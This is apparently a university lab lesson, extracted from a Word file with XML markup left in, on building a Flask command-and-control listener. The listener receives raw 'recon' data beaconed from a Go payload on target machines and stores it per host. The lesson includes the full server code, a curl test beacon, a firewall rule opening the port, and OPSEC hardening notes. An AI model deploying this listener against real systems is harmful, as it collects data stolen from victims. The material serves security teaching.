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SETU Cybercrime &amp; IT Security — Final Year Project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L05 — Building the Flask C2 Listener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2E6DA4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /beacon route, raw byte ingestion, timestamped file storage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="6" w:space="1"/>
        </w:pBd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Lesson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C2 — L05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03 — C2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MITRE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T1071.001 — Web Protocols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Jake Powell Langstaff — C00287662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6DA4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1. What the C2 Server Does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The C2 server is a minimal Flask application that listens on port 5000. Its only job: accept POST requests from the payload, save the contents to disk with a unique filename, and return a JSON confirmation. There is no dashboard, no authentication (covered in the OPSEC section), no database. Just a listener and a folder.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Test the server with curl before connecting the Go payload. This separates the two sides — if curl works and Go does not, the problem is in the Go code. If curl fails, the problem is in Flask.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="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6DA4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2. The Complete Server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5c6370"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># c2_upload.py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flask import Flask, request, jsonify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os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datetime import datetime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 = Flask(__name__)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UPLOAD_FOLDER = os.path.join(os.path.dirname(__file__), "uploads")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os.makedirs(UPLOAD_FOLDER, exist_ok=True)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@app.route("/beacon", methods=["POST"])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beacon():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 = request.get_data()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data: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jsonify({"status": "error", "reason": "empty body"}), 400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filename = request.headers.get("X-Filename", "recon.txt")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host_id  = request.headers.get("X-Host", "unknown")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timestamp = datetime.utcnow().strftime("%Y%m%d_%H%M%S")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out_name  = f"{host_id}_{timestamp}_{filename}"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out_path  = os.path.join(UPLOAD_FOLDER, out_name)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open(out_path, "wb").write(data)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jsonify({"status": "ok", "saved_as": out_name, "size_bytes": len(data)}), 200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__name__ == "__main__":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app.run(host="0.0.0.0", port=5000, debug=True)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6DA4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3. Testing with curl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5c6370"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Start the server in one terminal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c2_upload.py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5c6370"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># In a second terminal — send a test beacon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-X POST http://localhost:5000/beacon ^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-H "Content-Type: application/octet-stream" ^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-H "X-Host: test-machine" ^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-H "X-Filename: recon_test.txt" ^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--data-binary "Test recon data"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5c6370"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Expected: {"saved_as":"test-machine_20240315_140000_recon_test.txt","size_bytes":16,"status":"ok"}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6DA4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4. Key Design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request.get_data(): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reads the entire request body as raw bytes without parsing. The payload sends the recon file as a raw binary stream — using request.json would fail.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Unique filename: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">host_id + timestamp + original filename ensures no two beacons overwrite each other even if multiple targets beacon simultaneously.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host="0.0.0.0": </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Binds to all interfaces so the target VM can reach it. If you bind to 127.0.0.1 only, the VM cannot connect.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Firewall rule: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Firewall on the operator machine blocks port 5000 by default. Add an inbound TCP rule: netsh advfirewall firewall add rule name="Flask C2" dir=in action=allow protocol=TCP localport=5000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="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6DA4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5. OPSEC Considerations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The current server has no authentication — any machine that can reach port 5000 can POST beacons and pollute the uploads folder. In a real engagement you would add a pre-shared token header and reject requests without it. For the lab this is acceptable.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The Flask debug mode (debug=True) should be disabled in production — it exposes an interactive debugger. For the lab it provides useful error output.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="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6DA4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6. Exercises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Start the C2 server and send a test beacon with curl. Verify the file appears in uploads/ with the correct name format.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Send two beacons with the same X-Host header but 1 second apart. Confirm both files are saved separately (the timestamp prevents collision).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 Wireshark, capture the curl request. What headers are visible in plaintext? What does this tell you about plain HTTP versus HTTPS for a real deployment?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a simple token check: if the X-Token header is absent or wrong, return 403. This is one line of Flask code. Test that curl fails without the token and succeeds with it.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2026-03-31T22:16:36.842Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-31T22:16:36.842Z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